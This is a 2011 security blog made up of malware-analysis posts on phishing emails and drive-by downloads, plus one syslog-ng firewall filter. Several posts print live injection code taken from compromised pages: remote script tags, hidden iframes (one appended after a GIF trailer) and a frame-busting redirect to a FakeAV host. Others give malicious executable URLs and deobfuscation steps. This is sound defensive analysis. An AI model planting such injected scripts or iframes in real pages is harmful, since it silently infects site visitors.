Wednesday, December 21, 2011

Blackhole Toolkit drive-by download reversed

So... we've been seeing those "Transaction system failure" emails. Included in the email is this great tidbit:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
<script language="JavaScript" type="text/JavaScript" src="hxxp://bobosbouncytown.com/jscript.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://dzevents-algerie.com/jscript.js"></script>
<script language="JavaScript" type="text/JavaScript" src="hxxp://sammy.dommel.be/gogleads.js"></script>
</html>
 

So let's wget one of these (from an isolated analysis box, not your desktop) and see what we have:

document.location='http://curvechurch.com/main.php?page=4a4fd3141d846cdd';


Let's wget THAT and see what we have:

Yugh... obfuscated JavaScript... ick. So let's fire up Malzilla and see what we can do. I copied the above into the Decoder tab and hit Debug. I get:
 
aa is not defined 

Well that stinks.  But I DO get some good info from the Variable State window, so let's change the easy ones:

d="doc";
e='ev';
w=window;
g='fromCharCode';
if(w[d+"ument"])aa=([].unshift+'');
aa=aa.split('').pop();



Still the same "aa is not defined" error after clicking Debug. That actually makes sense: Malzilla's script engine hands the script a bare-bones window, not a real browser document object, so the if(w[d+"ument"]) test never passes and aa is never assigned. It is the script's cheap "am I in a browser or in a sandbox?" check. So let's nuke that if portion so the line reads:
aa=([].unshift+'');

Now we're hot doggin!  Closing the Debug window will give us:

So let's see what that eval_temp file is: open the temp file in Notepad/WordPad, copy ALL of it, create a new Decoder tab in Malzilla, dump it in and hit Format Code:

Note the rabbit link. Now... there's a LOT of crap going on here: PDF/Java/Flash version checks (plugin fingerprinting, so the kit can pick an exploit the victim's browser will actually take), to name a few. But what caught my eye was down at the bottom:

Let's copy all those comma-separated numbers, go to Misc Decoders and paste them in. Don't forget to add a comma at the very start of the string. Click the Decode Dec(,) button:

Hey hey! Look at that. Let's wget THAT link and see what we get:

Vicheck and Virustotal don't show much...scary:
http://www.virustotal.com/file-scan/report.html?id=453b83d472e378cb306ae282ebeb51765545892637bd087aa2a916df1a3fb934-1324483480

https://www.vicheck.ca/md5query.php?hash=559ccdd2ae813251d28cf6ab15195fff  

Monday, November 14, 2011

Syslog-ng and firewall filtering

So, I use Sagan to pipe firewall hits to a database.  One of the challenges is filtering out certain IP addresses.  The below filter worked for me:

filter f_firewall {
        not (
        program ("firewall" flags(ignore-case))
                and message("Deny" flags(ignore-case))
                        and (
                                message('192.168.' type(string) flags(substring))
                                or message('169.254.' type(string) flags(substring))
                              )
                );
};
 

Monday, June 27, 2011

NACHA Phish

This one just started today:

The PDF link actually points to:
hxxp://nacha-reports-domain.com/cancelled-transaction.pdf.exe

Virus detection is spotty:

http://www.virustotal.com/file-scan/report.html?id=967bd9f5dee7c7fbf8f7c95591326470f385265b613a0b15b7617e814c3b115e-1309201304

Saturday, June 25, 2011

Malicious iFrame in GIF request

The IDS hit:
15:15:37  [1:2406560:255] ET RBN Known Russian Business Network IP TCP (281) [**] [Classification: Misc Attack] [Priority: 2] {TCP} int.ip:51352 -> 69.4.229.56:80

The httpry info:
magazine.gem-fashion.com      69.4.229.56     http://magazine.gem-fashion.com/wearing-jewelry.html
magazine.gem-fashion.com      69.4.229.56     http://magazine.gem-fashion.com/img/

From wearing-jewelry.html:

            <td align="right" nowrap="nowrap"><label for="comment[comment]">Comment</label></td>
            <td align="left"><textarea name="comment[comment]" cols="50" rows="5" id="comment[comment]" class=""></textarea></td>
          </tr>
          <tr>
            <td colspan="2" align="center" nowrap="nowrap"><table border="0" cellspacing="0" cellpadding="3">
              <tr align="center">
                <td align="right"><img src="http://magazine.gem-fashion.com/img/" border="0" /></td>
                <td align="left"><input type="button" value="Give me another word, please" class="sub" onclick="this.form.submit()" /></td>
              </tr>
            </table>
            </td>

Header and file (note: a 404, yet Content-Type image/gif and a 1221-byte body: a real GIF with an iframe tacked on after the 0x3B trailer, which an image decoder simply ignores):
GET /img/ HTTP/1.1
Cookie: <snip>
Host: magazine.gem-fashion.com
Accept: */*
Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive

HTTP/1.1 404 Object Not Found
Date: Fri, 24 Jun 2011 21:15:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: <snip>; path=/
Content-Length: 1221
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/gif

GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd.........TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,.............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~..
.a
.I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B.......I..H...9P....n%3
....7E...B..-B...
JhC..H...G...TaX@...D......%.@..!.........l.0.L....3n.r .."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:..@...W.#?.r......\x.."L.7..6M..-..?r..@d
..Q]b.......H4.3....&.........^|X.A..s./g........
Y.....O...P.)...@...;..r.p..6y....^..;,w.....i...4..p.x..I..E
...).<2
.......$...... ^.2.vo....`.(..y...B
M<..1
...dm)....y0.~.. ..D...Cs
.'B.#LD.w?..A.F.......b.....4d.0.5..`..9%.....@C.bIs.....R......z...R
.!e.U^.Z..  ..@..@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D
b.....B..4;.D.r7........P
eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2.@AA...C......J~ ......
.!..
!p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$....q.\....7D..
..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Hexdump of gif:
15:48:15 ~/Forensics/$ hexdump -C index.html.gif
00000000  47 49 46 38 37 61 96 00  1e 00 a5 00 00 04 02 04  |GIF87a..........|
00000010  84 82 84 44 42 44 c4 c2  c4 24 22 24 a4 a2 a4 64  |...DBD...$"$...d|
00000020  62 64 e4 e2 e4 14 12 14  94 92 94 54 52 54 d4 d2  |bd.........TRT..|
00000030  d4 34 32 34 b4 b2 b4 74  72 74 f4 f2 f4 0c 0a 0c  |.424...trt......|
<snip>
00000420  05 37 44 10 86 0d c5 82  7c c7 a4 65 3a 14 c6 60  |.7D.....|..e:..`|
00000430  0e ab ac 85 c8 b0 bd 0b  02 05 2e 9c 2a 33 17 31  |............*3.1|
00000440  f9 1b 58 09 21 84 50 41  cc 3b 17 6d f4 d1 48 1b  |..X.!.PA.;.m..H.|
00000450  1d 04 00 3b 3c 69 66 72  61 6d 65 20 73 72 63 3d  |...;<iframe src=|
00000460  27 68 74 74 70 3a 2f 2f  61 6c 61 71 69 71 2e 6e  |'http://alaqiq.n|
00000470  65 74 2f 71 75 72 61 6e  2f 67 73 74 61 74 61 2f  |et/quran/gstata/|
00000480  69 6e 64 65 78 2e 70 68  70 27 20 77 69 64 74 68  |index.php' width|
00000490  3d 27 31 27 20 68 65 69  67 68 74 3d 27 31 27 20  |='1' height='1' |
000004a0  73 74 79 6c 65 3d 27 76  69 73 69 62 69 6c 69 74  |style='visibilit|
000004b0  79 3a 20 68 69 64 64 65  6e 3b 27 3e 3c 2f 69 66  |y: hidden;'></if|
000004c0  72 61 6d 65 3e                                    |rame>|
000004c5

Monday, June 20, 2011

Federal Tax transfer reject phish

This one is a hoot. The email looks like the below (many blog posts currently look like this as well):


Clicking the link gets you a redirect (cz.cc... surprise, surprise):

Connecting to irs-reports-web-1258store.info|64.202.189.170|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 301 Moved Permanently
Connection: keep-alive
Date: Mon, 20 Jun 2011 14:47:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://uahdflkbhdanf.cz.cc/forum.php?tp=b30225f7d8a8e859
Cache-Control: private
Content-Length: 0
Location: http://uahdflkbhdanf.cz.cc/forum.php?tp=b30225f7d8a8e859 [following]
--2011-06-20 08:47:44-- http://uahdflkbhdanf.cz.cc/forum.php?tp=b30225f7d8a8e859
Resolving uahdflkbhdanf.cz.cc... 89.208.149.215
Connecting to uahdflkbhdanf.cz.cc|89.208.149.215|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 20 Jun 2011 18:46:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.5
Length: unspecified [text/html]
Saving to: `index.html'

Once that's done you'll get a nice taste of FAKEAV...headers:

GET /TAX25379001.pdf.exe HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: irs-web-report.info


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 15:29:32 GMT
Set-Cookie: BX=64qgorh6vupqs&b=3&s=0f; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.irs-web-report.info
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 20 Jun 2011 11:45:11 GMT
Accept-Ranges: bytes
Content-Length: 228864
Content-Type: application/octet-stream
Age: 0
Connection: close
Server: YTS/1.19.8
MZP.....................@...............................................!..L.!..This program must be run under Win32

Latest VirusTotal is spotty...10/32


Update #1
These .info domains are only up for a few moments, it seems; attempts to fetch them later show them as unresolved. These have been tagged as ZBOT.

Wednesday, June 15, 2011

Driveby #2

Httpry info...
www.mrexcel.com 216.92.17.166 http://www.mrexcel.com/forum/showthread.php?t=53064
www.tranatunbh.dumb1.com 95.143.195.134 http://www.tranatunbh.dumb1.com/or.js?excel
www.mindrkolk.co.tv 88.198.41.180 http://www.mindrkolk.co.tv/mi6djcb0/?2

Headers...
GET /or.js?excel HTTP/1.1
Host: www.tranatunbh.dumb1.com
Accept: */*
Referer: http://www.mrexcel.com/forum/showthread.php?t=53064
Accept-Language: en-us
UA-CPU: x86
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 22:01:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Set-Cookie: RFC=md5hash10134976; expires=Tue, 21-Jun-2011 22:01:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 129
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/javascript

From dumb1.com...
document.write("<iframe border='0' src='http://www.mindrkolk.co.tv/mi6djcb0/?2' frameborder='0' height='1' width='1'></iframe>");
(The blog's rendering swallowed the <iframe tag; it is restored here, and the 129-byte Content-Length above matches the restored line.)

Driveby #1

IDS hits..yay
06/14-12:34:57.964011 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80
06/14-12:35:05.076928 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80
06/14-12:35:35.705572 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
06/14-12:35:48.121428 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80
06/14-12:35:52.852374 [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80

httpry
www.markandchappell.com 194.125.149.132 http://www.markandchappell.com/us/index.html
indometastan.in 195.43.94.64 http://indometastan.in/in.cgi?default

Malicious iFrame appended to the end of index.html (the leading < was lost in rendering):
<iframe src='http://indometastan.in/in.cgi?default' width='2' height='2' frameborder='0'>

Friday, June 10, 2011

Standard SEO with a dash of driveby

Web path:
http://compromisedsite.com/casseroles-how-to-write-a-letter-of-congratulations-on-high/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw==
http://wmodmon.ce.ms/<lots of FakeAV gifs/pngs/jpgs>
http://wmodmon.ce.ms/ <- the naughty exe


Here's the script that was hosted on compromisedsite.com (reflowed; a stray "." before the if had crept into the paste). Note the frame check: if the page has been loaded inside an iframe it redirects the top-level window instead, so the victim lands on wmodmon.ce.ms either way:

var url = "http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw==";
function goToOtherPlace() {
    if (window != top) {
        top.location.href = url;   // framed: bust out and take the whole window along
    } else {
        document.location = url;   // not framed: plain redirect
    }
}
window.setTimeout(goToOtherPlace, 10);



This httpry shows that wmodmon.ce.ms was the referrer:
ajax.googleapis.com /ajax/libs/jquery/1.4.2/jquery.min.js http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw== - -

Sanitized headers of the jquery.min.js GET:
GET /ajax/libs/jquery/1.4.2/jquery.min.js HTTP/1.1
Host: ajax.googleapis.com
Accept: */*
Referer: http://wmodmon.ce.ms/index.php?Q4nhCtQ+bdtGN3oyM2NNpStXBf+7FmMQrUz+2RAk5x6CDiCaiA0+CAPu4mbsEVhps+2lPyxaHLwxN5gHpEXNbVU8O6mMEeDeP7tRARfku8sPmRqSRZvn/a1c4BaHRw==
Accept-Language: en-us
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 15 Feb 2010 23:30:12 GMT
Date: Wed, 08 Jun 2011 09:19:23 GMT
Expires: Thu, 07 Jun 2012 09:19:23 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Age: 40917
Transfer-Encoding: chunked


Sanitized headers of the EXE GET:
GET / HTTP/1.1
Host: wmodmon.ce.ms
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-shockwave-flash, */*
Accept-Language: en-us
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Disposition: attachment; filename="InstallSecurityCentral_477.exe"
Content-Type: application/force-download
Date: Wed, 08 Jun 2011 21:42:02 GMT
Server: Apache
Content-Length: 287440


MZ......................@...............................................!..L.!This program cannot be run in DOS mode.